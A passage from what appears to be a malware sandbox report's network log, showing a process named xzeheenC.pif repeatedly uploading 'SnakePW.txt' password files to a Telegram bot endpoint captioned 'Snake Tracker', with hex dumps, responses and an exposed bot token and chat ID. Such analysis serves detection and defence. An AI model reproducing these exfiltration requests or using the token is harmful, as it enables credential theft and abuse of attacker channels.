                                                                                                                      2024-12-18 15:18:43 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 66 31 64 38 66 31 39 30 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd24f1d8f190eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:43 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:43 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:43 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419000,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535123,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      97192.168.2.550089149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:43 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd25151bda7f10
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:43 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 31 35 31 62 64 61 37 66 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd25151bda7f10Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:44 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:44 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:44 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419002,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535124,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      98192.168.2.550090149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:44 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd28b07a2e3bf6
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:44 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 38 62 30 37 61 32 65 33 62 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd28b07a2e3bf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:45 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:44 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419004,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535124,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      99192.168.2.550094149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:45 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2541c39c92aa
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:45 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 34 31 63 33 39 63 39 32 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2541c39c92aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:45 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:45 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419006,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535125,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      100192.168.2.550096149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:45 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2570877d30d9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-18 15:18:45 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 37 30 38 37 37 64 33 30 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2570877d30d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:46 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:46 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:46 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419008,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535126,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      101192.168.2.550098149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:46 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2941500303d9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:46 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 39 34 31 35 30 30 33 30 33 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2941500303d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:47 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:46 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:47 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 32 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419010,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535126,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      102192.168.2.550100149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd25d7579be125
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 64 37 35 37 39 62 65 31 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd25d7579be125Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:51 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 33 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419012,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535131,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      103192.168.2.550104149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:51 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
